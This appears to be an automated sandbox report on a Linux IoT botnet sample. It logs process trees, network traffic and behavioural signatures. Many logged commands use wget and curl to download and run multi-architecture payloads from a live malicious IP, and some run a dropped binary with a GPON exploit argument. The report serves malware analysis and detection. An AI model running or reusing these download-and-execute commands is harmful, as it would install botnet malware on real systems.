/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 config-err-gSYeSF g0away netplan_escgt653 snap-private-tmp ssh-DGjiLaK51db6 systemd-private-7d704eabf2e542bc8051481b6b431471-bolt.service-e6jDAF systemd-private-7d704eabf2e542bc8051481b6b431471-colord.service-KeVe2N systemd-private-7d704eabf2e542bc8051481b6b431471-ModemManager.service-AQvz0Z systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-resolved.service-Km8n5c]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc]

/bin/cat

[cat m3th.arc]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 config-err-gSYeSF g0away netplan_escgt653 snap-private-tmp ssh-DGjiLaK51db6 systemd-private-7d704eabf2e542bc8051481b6b431471-bolt.service-e6jDAF systemd-private-7d704eabf2e542bc8051481b6b431471-colord.service-KeVe2N systemd-private-7d704eabf2e542bc8051481b6b431471-ModemManager.service-AQvz0Z systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-resolved.service-Km8n5c]

/tmp/g0away

[./g0away gpon443.exploit]

Network

Country | Destination | Domain | Proto
HR | 45.95.168.230:80 |  | tcp
N/A | 224.0.0.251:5353 |  | udp
GB | 185.125.188.61:443 |  | tcp
GB | 185.125.188.61:443 |  | tcp
US | 151.101.129.91:443 |  | tcp
US | 1.1.1.1:53 | ocp-ingress.fastly.gnome.org | udp
US | 151.101.1.91:443 | ocp-ingress.fastly.gnome.org | tcp
GB | 89.187.167.8:443 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted: 2024-08-23 04:55
Reported: 2024-08-23 04:58
Platform: debian9-armhf-20240611-en
Max time kernel: 79s
Max time network: 83s

Command Line

[/tmp/ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118]

Signatures

Executes dropped EXE

Description | Indicator | Process | Target
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A

Checks CPU configuration

Tags: antivm

Description | Indicator | Process | Target
File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A
File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A
File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A
File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A
File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A
File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A
File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A
File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A
File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A
File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A
File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A
File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A
File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A

Reads runtime system information

Description | Indicator | Process | Target
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A
File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A
File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A
File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A
File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A
File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A
File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A

Writes file to tmp directory

Description | Indicator | Process | Target
File opened for modification | /tmp/g0away | /tmp/ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 | N/A

Processes

/tmp/ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118

[/tmp/ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]

/bin/cat

[cat m3th.x86]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-iXAHmk]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]

/bin/cat

[cat m3th.mips]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-iXAHmk]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]

/bin/cat

[cat m3th.mpsl]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-iXAHmk]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]

/bin/cat

[cat m3th.arm]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-iXAHmk]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]

/bin/cat

[cat m3th.arm5]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]

/bin/cat

[cat m3th.arm6]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]

/bin/cat

[cat m3th.arm7]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]

/bin/cat

[cat m3th.ppc]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]

/bin/cat

[cat m3th.m68k]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]

/bin/cat

[cat m3th.spc]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]

/bin/cat

[cat m3th.i686]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4]

/bin/cat

[cat m3th.sh4]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc]

/bin/cat

[cat m3th.arc]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

Network

Country | Destination | Domain | Proto
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp

Files

memory/814-1-0xb6769000-0xb677a044-memory.dmp

memory/837-2-0xb669c000-0xb66ad044-memory.dmp